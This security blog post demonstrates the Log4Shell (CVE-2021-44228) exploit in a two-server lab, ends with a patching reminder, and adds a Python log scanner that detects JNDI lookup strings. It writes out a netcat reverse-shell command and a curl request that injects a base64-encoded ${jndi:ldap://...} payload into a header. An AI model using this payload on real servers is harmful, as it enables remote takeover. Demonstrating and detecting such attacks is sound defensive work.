VXRL

Dec 11, 2021


Log4j Demonstration

Researcher: {Alan Ho}

A critical vulnerability in Apache Log4j was discovered and published; it has a huge impact on countless servers.

There are already posts describing the details of the vulnerability (CVE-2021-44228), so we are just going to demonstrate how this vulnerability can be exploited.

We have prepared two servers in AWS. One acts as the vulnerable server, which uses an exploitable version of log4j.

[Screenshot: vulnerable server]

The other server runs a malicious LDAP server and a netcat listener for the remote shell.

[Screenshot: malicious LDAP server]

[Screenshot: netcat listener waiting for the remote shell]

The malicious LDAP server supports base64-encoded commands in the URL path:

ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]

We prepare the command:

nc 3.86.225.135 4444 -e /bin/sh

and base64-encode it.

[Screenshot: base64-encoding the remote shell command]

With the servers and the command in place, we launch the attack.

curl 52.23.211.253:8080 -H 'X-Api-Version: ${jndi:ldap://3.86.225.135:1389/Basic/Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}' 
[Screenshot: launching the attack]

The vulnerable server encountered errors.

[Screenshot: errors on the vulnerable server]

The malicious LDAP server received the command and the vulnerable server is owned.

[Screenshot: the malicious LDAP server received the command]

[Screenshot: Profit! The server is owned.]

Video demonstration:

As this simple demonstration shows, once the malicious LDAP server is set up, it is easy to launch the attack and own the server.

ref: https://www.lunasec.io/docs/blog/log4j-zero-day/

Please check your applications and update to a version that fixes the issue.
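
As part of that check, request logs can be searched for the lookup string used in the demonstration. The following is an added example, not code from the original post: it finds plain `${jndi:...}` lookups in log lines and decodes the command carried in the `/Basic/Command/Base64/` path, so a responder can see which callback host was named and what the server was told to run. The log format and the names `scan`, `decode_command` and `SAMPLE_LOG` are assumptions, and the sample lines are constructed.

```python
import base64
import re
from urllib.parse import unquote

# Plain ${jndi:scheme://host[:port]/path} lookup, the form used in the request above.
# Assumption: nested or otherwise rewritten lookups are out of scope for this sketch.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<callback>[^/}\s]+)(?P<path>/[^}\s]*)?\}", re.I
)
# URL layout of the LDAP server described in this post.
B64_PATH_RE = re.compile(r"/Basic/Command/Base64/(?P<b64>[A-Za-z0-9+/=]+)$")

# Constructed sample log (hypothetical format that records the X-Api-Version header).
SAMPLE_LOG = [
    '198.51.100.7 "GET / HTTP/1.1" 200 x-api-version="1.0"',
    '198.51.100.8 "GET / HTTP/1.1" 200 x-api-version="${jndi:ldap://3.86.225.135:1389'
    '/Basic/Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}"',
    '198.51.100.9 "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%3A1389%2Fa%7D HTTP/1.1" 200',
]


def decode_command(path):
    """Return the command carried in a /Basic/Command/Base64/ path, else None."""
    m = B64_PATH_RE.search(path or "")
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def scan(lines):
    """Return one finding per JNDI lookup seen in the log lines."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        line = unquote(raw)  # lookups in the URL may arrive percent-encoded
        for m in JNDI_RE.finditer(line):
            findings.append({
                "line": lineno,
                "scheme": m.group("scheme").lower(),
                "callback": m.group("callback"),
                "command": decode_command(m.group("path")),
            })
    return findings


if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit only shows that a lookup string reached the log; whether the server acted on it still has to be confirmed from outbound connections to the callback host.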
